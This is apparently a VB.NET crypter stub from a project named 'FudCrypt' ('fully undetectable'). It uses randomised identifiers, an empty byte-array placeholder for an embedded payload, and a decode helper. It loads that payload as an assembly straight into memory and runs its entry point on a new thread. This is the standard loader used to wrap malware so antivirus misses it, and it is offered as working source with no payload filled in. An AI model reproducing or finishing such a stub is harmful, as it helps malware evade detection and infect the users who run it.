Imports System
Imports System.Reflection
Imports System.Threading
Imports System.Web

Namespace FudCrypt

    Public Class OcYjzPUtJkNbLOABqYvNbvhZf

        Shared gwiXxyIDDtoYzgMSRGMckRbJi As String = ""

        <STAThread>
        Private Shared Sub Main(ByVal args As String())
            Dim assemblyParameters As Object() = New Object(0) {}
            Dim unloadedAssembly As Byte() = New Byte() {}
            Dim loadedAssembly As Assembly = Nothing
            Try
                loadedAssembly = Thread.GetDomain().Load(unloadedAssembly)
            Catch badImageFormatException As BadImageFormatException
                Console.WriteLine("Image is not managed")
            End Try

            If loadedAssembly Is Nothing Then Return
            Try
                Dim threadState As ApartmentState = ApartmentState.Unknown
                If loadedAssembly.EntryPoint.GetParameters().Length > 0 Then
                    assemblyParameters(0) = New String() {Nothing}
                    threadState = ApartmentState.STA
                Else
                    assemblyParameters(0) = Nothing
                    threadState = ApartmentState.MTA
                End If

                Dim assemblyThread As Thread = New Thread(Sub()
                    loadedAssembly.EntryPoint.Invoke(Nothing, assemblyParameters)
                End Sub)
                assemblyThread.SetApartmentState(threadState)
                assemblyThread.Start()
            Catch invocationException As TargetInvocationException
                Console.WriteLine("An error has occured")
            End Try
        End Sub

        Public Shared Function Decode(ByVal data As String) As Byte()
            Return HttpServerUtility.UrlTokenDecode(data)
        End Function
    End Class
End Namespace
